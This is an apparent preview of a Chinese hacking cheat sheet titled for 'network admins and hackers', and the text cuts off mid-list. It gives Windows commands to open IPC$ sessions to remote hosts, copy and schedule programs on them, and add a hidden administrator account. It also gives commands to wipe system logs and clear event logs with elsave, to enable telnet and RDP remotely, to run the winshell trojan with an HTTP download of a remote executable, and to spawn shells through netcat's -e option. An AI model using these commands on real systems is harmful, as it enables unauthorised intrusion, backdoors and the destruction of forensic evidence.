文档详情

网管和黑客都必须知道的命令.pdf

发布:2019-04-04约9.02千字共7页下载文档
文本预览下载声明
管和黑客都必须知道的命令 常用的几条NET 命令: ================================================== (与远程主机建立空管连接) net use \\IP 地址\ipc$ /use: (以管理员身份登录远程主机) net use \\IP 地址\ipc$ 密码 /use:Administrator (传送文件到远程主机WINNT 目录下)copy 本机目录路径\程序 \\IP 地址\admin$ (查看远程主机时间) net time \\IP 地址 (定时启动某个程序) at \\IP 地址 02:18 readme.exe (查看共享) net view \\IP 地址 (查看netbios 工作组列表) nbtstat -A IP 地址 (将远程主机C 盘映射为自己的F 盘) net use f: \\IP 地址\c$ /user:Administrator (这两条把自己增加到管理员组): net user 用户名 密码 /add net localgroup Administrators 用户名 /add (断开连接) net use \\IP 地址\ipc$ /delete ===================================================== 擦屁屁: del C:\winnt\system32\logfiles\*.* del C:\winnt\system32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log ============================ 一、netsvc.exe 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的 “时间任务”服务: netsvc /list \\IP 地址 netsvc schedule \\IP 地址 /query netsvc \\IP 地址 schedule /start 二、OpenTelnet.exe 远程启动主机的Telnet 服务,并 定端口到7878,例如: OpenTelnet \\IP 地址 用户名 密码 1 7878 然后就可以telnet 到主机的7878 端口,进入DOS 方式下: telnet IP 地址 7878 三、winshell.exe 一个非 小的木马 (不到6K ),telnet 到主机的7878 端口,输入密码winshell,当看到CMD后,可打下 面的命令: p Path (查看winshell 主程序的路径信息) b reBoot (重新启动机器) d shutDown (关闭机器) s Shell (执行后你就会看到可爱的“C:\ ”) x eXit (退出本次登录会话,此命令并不终止winshell 的运行) CMD http://.../srv.exe (通过http 下载其他网站上的文件到运行winshell 的机器上) 四、3389 登陆器,GUI 方式登录远程主机的 五、elsave.exe 事件日志清除工具 elsave -s \\IP 地址 -l application -C elsave -s \\IP 地址 -l system -C elsave -s \\IP 地址 -l security -C 执行后成功清除应用程序日志,系统日志,安全日志 六、hbulot.exe 开启win2kserver 和winxp 的3389 服务 hbulot [/r] 使用/r 表示安装完成后自动重起目标使设置生效。 七、nc.exe(netcat.exe) 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 想要连接到某处: nc [-options] hostname port[s] [ports] ... 定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危 !!] -g gateway source-routing hop point[s], up to 8 -G num sour
显示全部
相似文档